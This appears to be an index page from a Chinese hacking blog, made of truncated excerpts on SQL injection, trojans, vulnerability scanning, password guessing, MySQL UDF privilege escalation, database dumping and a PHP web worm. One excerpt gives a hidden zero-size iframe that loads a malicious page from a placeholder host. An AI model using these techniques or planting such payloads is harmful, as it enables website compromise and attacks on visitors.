会说话的狗

在登陆后台时，接收用户输入的Userid和Password数据，并分别赋值给user和pwd，然后再用 sql="select * from admin where username="&user&" and password="&pwd&"" 这句来对用户名和密码加以验证。 以常理来考虑的话，这是个很完整的程序了，而在实际的使用...

第三节、木马与后门        现在我们来看看木马在黑客学习中的作用。首先学习者要明确木马究竟是什么，同时还要搞清楚木马的类型，并且学习一些流行的木马程序的用法，这是一个相辅相成的学习进程，当黑客利用漏洞进入服务器之后，就可以选择两条路：一、破坏系统、获得资料、...

一、扫描器的使用：         这里我使用x-scanner作为介绍对象，原因是x-scanner集成了多种扫描功能于一身，它可以采用多线程方式对指定IP地址段（或独立IP地址）进行安全漏洞扫描，提供了图形界面和命令行两种操作方式，扫描内容包括：标准端口状态及端口banner信息、CGI...

一、ping命令 在Windows的控制窗口中（Windows 95/98/ME的command解释器、Windows NT/2000的cmd解释器），运行ping可以看到这个命令的说明，它是一个探测本地电脑和远程电脑之间信息传送速度的命令，这个命令需要TCP/IP协议的支持，ping将会计算一条信息从本地发送到远程再返回所需要的时间，黑客使用这个命令...

一、国产软件简介 溯雪 密码探测器：利用溯雪可以轻松的完成基于web形式的各种密码猜测工作，例如email、forum中的注册用户密码等。软件采取多线程编写，除了支持字典和穷举以外，软件最大的特色是可以自己编写猜测规则，例如可以按照中文拼音或者英文单词拼写规则随机组合出字典文件，最大程度上保证了猜测的...

       使用： 一、功能：利用MYSQL的自定义函数功能（再次声明：利用MYSQL UDF提权绝非是溢出，而是MYSQL本身的一个功能），将MYSQL账号转化为系统system权限。 二、适用场合：1.目标系统是Windows(Win2000,XP,Win2003)；2.你已经拥有MYSQL的某个用户账号，此账号必须有对mysq...

       SQL注入的重点就是构造SQL语句，只有灵活的运用SQL        语句才能构造出牛比的注入字符串。学完之后写了点笔记，已备随时使用。希望你在看下面内容时先了 解SQL的基本原理。笔记中的代码来自网络。 ===基础部分=== 本表查询： http://1...

       SQL注入流行很久了，我们找漏洞注入目的无非是想得到数据库内的东西，比如用户名密码等。（当然mssql数据库还可以借此获得权限）。如果我们不用注入就可以得到整个数据库，不是更好吗？于是暴库成了一个比注入更简单的的入侵手段。 　　有关暴库的方法，高手们常在入侵...

       本文以一些未公开的WEB蠕虫为例，这些蠕虫可通过PHP漏洞脚本进行自我传播。该蠕虫叫World Cant Wait ，在11.2被公布在成千上万个信息公告栏和博客上，以此反对布什政权。原先它利用的是一个私有漏洞，就是最近曝出的关于CuteNews 1.4的php代码执行漏洞。这个蠕虫可自动...

1，挂马的N种方法 　　(1) HTML挂马法。 　　常规的HTML挂马方法一般是在网页中插入一条iframe语句，像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂，一般是查找一下关键词iframe。 　　(2) 再隐藏一点的就是js挂马了。 　　像再原来的网页中写入<...